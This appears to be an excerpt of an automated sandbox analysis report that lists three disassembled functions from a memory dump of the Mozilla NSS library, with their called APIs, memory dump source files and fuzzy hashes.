                                                                                                                                                                                                                                                            Function 6BFB0900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • sqlite3_value_text.NSS3(?), ref: 6BFB0917
                                                                                                                                                                                                                                                            • sqlite3_value_text.NSS3(?), ref: 6BFB0923
                                                                                                                                                                                                                                                              • Part of subcall function 6BE713C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6BE42352,?,00000000,?,?), ref: 6BE71413
                                                                                                                                                                                                                                                              • Part of subcall function 6BE713C0: memcpy.VCRUNTIME140(00000000,R#k,00000002,?,?,?,?,6BE42352,?,00000000,?,?), ref: 6BE714C0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sqlite3_value_text$memcpystrlen
                                                                                                                                                                                                                                                            • String ID: error in %s %s%s%s: %s
                                                                                                                                                                                                                                                            • API String ID: 1937290486-1007276823
                                                                                                                                                                                                                                                            • Opcode ID: d96c563aabec85880d3d728a6c8da11f1caa5b09767e4e87347df19828ea56ed
                                                                                                                                                                                                                                                            • Instruction ID: 984e550f880a2c39cc086ca4c07fc7d254274f744dd5f3536f84333654084b7d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d96c563aabec85880d3d728a6c8da11f1caa5b09767e4e87347df19828ea56ed
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD0108B6E001055BEB009F68EC42A7ABBB9EFC1258F144039ED499B311F732AD1087A2
                                                                                                                                                                                                                                                            Function 6BEDFAA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,0000018C,00000001,?,?,#?k,?,6BEDE51D,?,?,?,00000001,00000000,?), ref: 6BEDFACB
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000,#?k,?,6BEDE51D,?,?,?,00000001,00000000,?,?,6BEE3F23,?), ref: 6BEDFAD8
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6BEC88A4,00000000,00000000), ref: 6BF21228
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6BF21238
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6BEC88A4,00000000,00000000), ref: 6BF2124B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PR_CallOnce.NSS3(6C022AA4,6BF212D0,00000000,00000000,00000000,?,6BEC88A4,00000000,00000000), ref: 6BF2125D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6BF2126F
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6BF21280
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6BF2128E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6BF2129A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6BF212A1
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6BF0F854
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6BF0F868
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6BF0F882
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: free.MOZGLUE(04C483FF,?,?), ref: 6BF0F889
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6BF0F8A4
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6BF0F8AB
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6BF0F8C9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: free.MOZGLUE(280F10EC,?,?), ref: 6BF0F8D0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$CriticalSection$Delete$ArenaFreePool$Arena_CallClearEnterOnceUnlockUtilValuememset
                                                                                                                                                                                                                                                            • String ID: #?k
                                                                                                                                                                                                                                                            • API String ID: 1626353133-3634264330
                                                                                                                                                                                                                                                            • Opcode ID: d359e6df7340f5b4766e63f5a6e5815f6e1cd95b491e2ec24efe80e283a7a7c5
                                                                                                                                                                                                                                                            • Instruction ID: e21a75b8c6c2757160247bcb67b1144a10809a66e4ac580306eacc3b56b9ff7a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d359e6df7340f5b4766e63f5a6e5815f6e1cd95b491e2ec24efe80e283a7a7c5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8F0CDB69001156FE7009BA4EC41AAB77ACEF4936CF150175F81C97311EBB9BD11C6E1
                                                                                                                                                                                                                                                            Function 6BF89A10 Relevance: 5.1, APIs: 4, Instructions: 58stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6BE55E90,?,nolock), ref: 6BF89A41
                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6BF89A5D
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BF89A68
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BF89A7D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$strcmp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 551667898-0
                                                                                                                                                                                                                                                            • Opcode ID: 725f868698ec2845c9a6b81273062ef7641817b9d857dee76b0420649f90c8f4
                                                                                                                                                                                                                                                            • Instruction ID: 89d78abffe7b138f119484687740236cdbb409c25c8b652e0705c9e346eef3c3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 725f868698ec2845c9a6b81273062ef7641817b9d857dee76b0420649f90c8f4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD0126F3C242463AE70142B09C49715FBB8AB12278F0CE3A1D838811A2FB3E94598351